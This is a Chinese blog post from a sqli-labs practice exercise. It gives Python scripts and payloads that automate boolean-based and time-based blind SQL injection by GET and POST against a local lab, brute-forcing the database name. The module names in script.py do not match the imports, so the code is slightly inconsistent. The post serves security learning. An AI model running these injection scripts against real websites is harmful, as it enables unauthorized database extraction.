sqli-labs时间盲注、布尔盲注脚本

已于 2024-09-27 17:56:50 修改
阅读量200 收藏 1
点赞数 2
文章标签: 网络安全 安全 sql linux python web安全
于 2024-09-27 17:55:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anddddoooo/article/details/142599352
版权
script.py:提供参数,用于调用布尔盲注或时间注入的函数
import time_type
import bool_type
​
​
# inject_type: 1.布尔盲注2.时间注入
# http_type:1.GET请求2.POST请求
# dict_para_data:所有的参数,和默认值
# vuln_para:注入的参数
# payloads:注入的内容
​
if __name__ == '__main__':
    # 时间注入POST测试
    dict_para_data = {
        'uname':'admin',
        'passwd':'123',
        'submit':'Submit'
    }
    vuln_para = 'uname'
    http_type = 2
    url = "http://127.0.0.1/sqli-labs/Less-15/"
    expected_time = 1
    payloads = [
        "admin' and if(substr(database(),",
        ",1)='",
        "',sleep(1),1) # "
    ]
    time_based.brute_enum_by_time(dict_para_data, vuln_para, http_type, url, expected_time, payloads)
time_based.py:遍历各个字符,并调用发送请求(GET/POST)函数
import req
​
​
# dict_para_data : 参数列表
# http_type : get还是post
# vuln_para : 易受攻击的参数
# payload : 收攻击参数的值
# url
# expected_time : 期待等待的时间
def send_payload_by_time(dict_para_data, http_type, vuln_para, payload, url, expected_time):
    # 时间盲注GET
    if http_type == 1:
        for tmp_para in dict_para_data.keys():
            if tmp_para ==  vuln_para:
                dict_para_data[tmp_para] = payload
                break
        return req.req_by_time_get(dict_para_data, url, expected_time)
    # 时间盲注POST
    if http_type == 2:
        # 替换掉注入的参数的数据为payload
        for tmp_para in dict_para_data.keys():
            if tmp_para ==  vuln_para:
                dict_para_data[tmp_para] = payload
                break
        # 返回判断的结果,预期结果为1,否则为0
        return req.req_by_time_post(dict_para_data, url, expected_time)
​
# dict_para_data : 参数列表
# vuln_para : 易受攻击的参数
# http_type : get还是post
# url
# expected_time : 期待等待的时间  
def brute_enum_by_time(dict_para_data, vuln_para, http_type, url, expected_time, payloads):
    print('[*] The Time-based blind injection is begin')
    brute_list1 = "0123456789abcdefghijklmnopqrstuvwxyz"
    brute_list2 = "123456789"
    result = ""
    # 遍历到字符串第tmp_int个字符
    for tmp_int in brute_list2:
        # 遍历的字符依次暴力枚举判断
        for tmp_char in brute_list1:
            payload = payloads[0] + tmp_int + payloads[1] + tmp_char + payloads[2]
            # 发送请求,并判断返回结果
            if send_payload_by_time(dict_para_data, http_type, vuln_para, payload, url, expected_time) == 1:
                result = result + tmp_char
                print(f"[*] The finding result: {result}")
    if result == "":
        print("[*] There is no finding result")
bool_based.py:遍历各个字符,并调用发送请求(GET/POST)函数
import req
​
​
# dict_para_data : 参数列表
# http_type : get还是post
# vuln_para : 易受攻击的参数
# payload : 收攻击参数的值
# url
# expected_data : 期待的返回结果 
def send_payload_by_bool(dict_para_data, http_type, inject_type, vuln_para, payload, url, expected_data):
    # 布尔盲注GET
    if http_type == 1:
        # 替换掉注入的参数的数据为payload
        for tmp_para in dict_para_data.keys():
            if tmp_para ==  vuln_para:
                dict_para_data[tmp_para] = payload
                break
        # 返回判断的结果,预期结果为1,否则为0
        return req.req_by_bool_get(dict_para_data, url, expected_data)
    # 布尔盲注POST
    if http_type == 2:
        for tmp_para in dict_para_data.keys():
            if tmp_para ==  vuln_para:
                dict_para_data[tmp_para] = payload
                break
        # 返回判断的结果,预期结果为1,否则为0
        return req.req_by_bool_post(dict_para_data, url, expected_data)
​
# dict_para_data : 参数列表
# vuln_para : 易受攻击的参数
# http_type : get还是post
# url
# expected_data : 期待的返回结果  
def brute_enum_by_bool(dict_para_data, vuln_para, http_type, inject_type, url, expected_data, payloads):
    print('[*] The Bool-based blind injection is begin')
    brute_list1 = "0123456789abcdefghijklmnopqrstuvwxyz"
    brute_list2 = "123456789"
    result = ""
    # 遍历到字符串第tmp_int个字符
    for tmp_int in brute_list2:
        # 遍历的字符依次暴力枚举判断
        for tmp_char in brute_list1:
            payload = payloads[0] + tmp_int + payloads[1] + tmp_char + payloads[2]
            # 返回的结果为真
            if send_payload_by_bool(dict_para_data, http_type, inject_type, vuln_para, payload, url, expected_data) == 1:
                result = result + tmp_char
                print(f"[*] The finding result: {result}")
    if result == "":
        print("[*] There is no finding result")
req.py:发送数据包并判断是否为预期结果,如果是则返回1,否则返回0
import requests
import time
# payload : 参数列表
# url
# expected_data : 期待的返回结果 
def req_by_bool_get(payload, url, expected_data):
    rep = requests.get(url, params=payload)
    if expected_data in rep.text:
        return 1
    else:
        return 0
​
def req_by_bool_post(payload, url, expected_data):
    rep = requests.post(url, data=payload)
    # print(rep.text)
    # print(payload)
    if expected_data in rep.text:
        return 1
    else:
        return 0
​
​
# payload : 参数列表
# url
# expected_time : 期待等待的时间长短 
def req_by_time_get(payload, url, expected_time):
    earlier = time.time()
    rep = requests.get(url, params=payload)
    latter = time.time()
    if latter - earlier >= expected_time:
        return 1
    else:
        return 0
        
def req_by_time_post(payload, url, expected_time):
    earlier = time.time()
    rep = requests.post(url, data=payload)
    latter = time.time()
    if latter - earlier >= expected_time:
        return 1
    else:
        return 0
测试1:布尔盲注GET请求
dict_para_data = {
        'id' : 'hack123'
    }
    vuln_para = 'id'
    http_type = 1
    inject_type = 1
    url = "http://127.0.0.1/sqli-labs/Less-8/"
    expected_data = 'are in'
    payloads = ["1' and substr(database()," , ",1)='" , "' and '1'='1"] 
    bool_based.brute_enum_by_bool(dict_para_data, vuln_para, http_type, inject_type, url, expected_data, payloads)
  
    
结果如下:

测试2:布尔盲注POST请求
# 布尔注入POST测试
    dict_para_data = {
        'uname':'admin',
        'passwd':'123',
        'submit':'Submit'
    }
    vuln_para = 'uname'
    http_type = 2
    inject_type = 1
    url = "http://127.0.0.1/sqli-labs/Less-15/"
    expected_data = 'flag.jpg'
    payloads = ["admin' and substr(database()," , ",1)='" , "' #"] 
    bool_based.brute_enum_by_bool(dict_para_data, vuln_para, http_type, inject_type, url, expected_data, payloads)

测试3:时间注入GET测试
    # 时间注入get测试
    dict_para_data = {
        'id': 'hack123'
    }
    vuln_para = 'id'
    http_type = 1
    url = "http://127.0.0.1/sqli-labs/Less-9/"
    expected_time = 1
    payloads = [
        "1' and if(substr(database(),",
        ",1)='",
        "',sleep(1),1) and '1'='1"
    ]
    time_based.brute_enum_by_time(dict_para_data, vuln_para, http_type, url, expected_time, payloads)

测试4:时间注入POST测试
    # 时间注入POST测试
    dict_para_data = {
        'uname':'admin',
        'passwd':'123',
        'submit':'Submit'
    }
    vuln_para = 'uname'
    http_type = 2
    url = "http://127.0.0.1/sqli-labs/Less-15/"
    expected_time = 1
    payloads = [
        "admin' and if(substr(database(),",
        ",1)='",
        "',sleep(1),1) # "
    ]
    time_based.brute_enum_by_time(dict_para_data, vuln_para, http_type, url, expected_time, payloads)

anddddoooo
关注
Sqli-labs-master靶场--布尔盲注
ningwangh的博客
08-05 795
布尔盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面,布尔盲注通常是由于开发者将报错信息屏蔽而导致的,但是网页中真和假有着不同的回显,比如为真时返回access,为假时返回false;如上图所示,如果数据库名的第一个字符的ascii码值等于97,则页面显示正确的页面,如果数据库名的第一个字符的ascii码值不等于97,则页面显示错误的页面,可以通过这种方式获取到数据库名,但效率过于低下,所以我们使用脚本来获取数据库名。id=1' 后,显示与上方不同,存在注入点。
sqli-labs布尔盲注时间盲注相结合的脚本实现
m0_71299382的博客
11-09 287
sqli-labs布尔盲注时间盲注相结合的脚本实现
sqli-labs-基于布尔盲注
zlloveyouforever的博客
04-29 1120
sqli-labs第五关--基于布尔盲注
sqli-labs Less-9 时间盲注
m0_63711447的博客
04-12 1058
使用的函数补充: if(condition,A,B)如果条件condition为true,则执行语句A,否则执行语句B eg.select if(1>2,3,4); 返回的结果为4(若是在MySQL命令行中使用,应先use xxx数据库) 可组合使用,当前数据库为security ...
SQL注入——sqli-labs-Less-9时间盲注
m0_63563528的博客
04-06 645
时间盲注 和 Bool 盲注很像,区别就是 “参照物” 的不同
sqli-labs靶场之时间盲注
2302_78903258的博客
05-19 645
这里可以解释为当我们进行数据库名的长度判断时,如果条件成立,sleep函数延迟3秒后回显界面,如果条件不成立,就输出0 -----提示一下,如果大家网络有延迟的话,将sleep()函数里面的值设置为大一点,5啊10啊都ok的。这里的判断语句跟布尔盲注基本是一样的,所以大家不懂得话可以先学一下布尔盲注,这里获得的是库名的第一个字符,其他字符只需要更改substr()函数的值就ok了-------可以的到数据库名为security。获得数据---------这里同样也有两种用法。
sqli-labs通关全解---关于盲注脚本的编写--less7-10-4
cyynid的博客
01-10 611
盲注
sqli-labs布尔盲注脚本的编写
0xdawn的博客
03-12 1404
0x00 前言 此脚本基于sqli-labs/Less-5编写,采用ASCII码判断布尔类型,注入标志为"You are in…"。 第一次独立编写完整脚本,感觉很多地方写的不好。条件分支,字典、列表的遍历都花了很长时间去弄 无论是时间复杂度还是代码可读性,感觉都很拉跨。师傅们轻喷。。。 以下是模块解析 0x01 模块 1.判断数据库库名长度 def db_length(): db_l...
SQLi LABS Less 9 时间盲注_sqli-labs 时间盲注脚本第九关
2301_76224593的博客
05-17 435
页面延时,说明字符的ASCLL码大于1,依次递增判断其余字符内容的可能性(32~126)。页面延时,说明长度大于1,依次递增长度判断,后面使用脚本自动化猜解。查询的正确与否不会影响页面的响应(只有一种响应),不适合布尔盲注。猜解出第一个字符后,在依次判断其余字符,后面使用脚本自动化猜解。输入任何参数,页面都只有一种响应结果:You are in…页面响应时间超过5秒,确定存在时间盲注。无报错信息,不适合报错注入;综上所述,考虑使用时间盲注
SQLi LABS Less-7 布尔盲注
热门推荐
wangyuxiang946的博客
04-01 1万+
SQLi 第七关,sqli-labs less-7,sqlilabs less 7
sqli-labs Less-5(布尔盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
01-31 646
前几篇sql注入文章 sqli-labs Less-1(联合注入、字符型注入) sqli-labs Less-2(联合注入、整形型注入) sqli-labs Less-3(联合注入、字符型注入) sqli-labs Less-4(联合注入、字符型注入) sqli-labs Less-5(利用extractvalue进行报错注入) sqli-labs Less-5(双注入) 布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利
sqli-labs Less-8(布尔盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-11 585
布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利用页面的返回结果来得知判断语句是否正确。 再学习布尔盲注之前,一些常用函数如下: length(): 返回字符串长度。 substr(str, start, len): 截取str,从start开始,截取长度为len。 ascii(): 返回字符串的ascii码。 1、判断共有几个数据库 payload ?id=1' and (select count(schema_na
sqli-labs第十五和十六关(post请求-布尔盲注
qq_42266432的博客
08-26 915
开启第十五关,先尝试注入,注入多次后发现页面无报错也无回显,于是尝试盲注 使用万能密码’ or 1=1登陆成功,’ or 1=2登录失败,这里可以使用布尔盲注, 研究响应页面发现登录成功和登录失败时底下的提示是一个图片,而图片的命名不同,可以此区分成功和失败,开始写脚本脚本的思路和之前使用布尔盲注的关卡类似,只需修改请求类型、数据和if条件即可,代码如下: import requests # 获取数据库名长度 def database_len(): for i in range(1,10):
sqli-labs第八关(布尔盲注
qq_42266432的博客
08-19 1456
第八关看标题可知此关可以使用布尔盲注布尔盲注我的理解是页面不会回显错误,但是注入等式或不等式时通过页面的反应能判断出注入中算式的true或false 布尔盲注的步骤如下: 获取数据库长度 获取数据库名 获取数据库表 获取表中字段 获取表中数据 先拿获取数据库长度举例 可以看到在length(database())>7时页面正常,length(database())>8时页面异常,即8>7=true,8>8=false,所以数据库名长度为8 再比如获取表名: 同理,sub
sqli-labs学习笔记(五)less 15-16 post盲注
闵行小鱼塘
09-08 572
继续学习sqli-labs,本篇是less15-16
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8480
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
部标主动安全(ADAS+DMS)对接说明
最新发布
谁念西风独自凉
09-27 580
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
【车联网安全】车端网络攻击及检测的框架/模型
#7的博客
09-24 1443
本文主要调研了车联网安全的一些攻击及检测的模型/框架,对国家标准进行了调研,并汇总上述调研内容。
个人计算机与网络的安全
nn_84的博客
09-24 399
关于 wifi 大家都知道 wifi 已经使用了 wpa3 非常安全 但很多人不知道 pin 和 wps 这两项有漏洞。种漏洞来控制用户电脑 老实说吧 默认用户仍然是管理员 像windows 是很容易得到最高权限的。关于 病毒 大家都知道中国 美国 俄罗斯 的黑客不断的在对抗 所以这病毒花样百出 所以系统用户。关于 国产的 linux 老实说全是漏洞 默认开启 很多服务 但初始化的设置都有漏洞。我发现很多用户都简单设置了这两项 他们的设置 使他们的网络出现了漏洞。
sqli-labs通用盲注脚本
06-14
SQL注入(Structured Query Language Injection,简称SQLi)是常见的Web安全漏洞之一,它发生在攻击者利用输入验证不足或错误处理不当的情况,将恶意SQL代码插入到应用程序的查询参数中。Sqli-Labs是一套在线的SQL注入学习平台,它提供了许多实际的场景和挑战,包括通用盲注(Generic Blind SQL Injection)的练习。 通用盲注是指攻击者在不知道具体数据库结构的情况下,通过试探性的查询来获取服务器对SQL语句响应的反馈,以此推断出敏感信息或验证漏洞的存在。通用盲注的常见脚本通常包含以下几个步骤: 1. **构造查询**:发起一个基础的SQL查询,然后向其添加一个变量或条件,比如 `SELECT * FROM users WHERE id = ?`,其中`?` 是变量。 2. **发送请求**:使用GET或POST方法提交这个带有变量的查询,变量会被网站替换为特定值进行执行。 3. **观察响应**:分析服务器返回的HTTP状态码、错误消息或者查询结果的长度等,这些信息可能暗示查询是否成功或返回了预期的数据。 4. **分析反馈**:通过多次尝试不同的变量值,比如 `id=1`, `id=2`, `id='1 union select 1,2,3,4,md5(0) from dual'`,观察服务器对不同查询的响应差异。 5. **逐步揭示数据**:基于反馈调整查询,逐步获取数据库中的数据,直到达到攻击目标。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值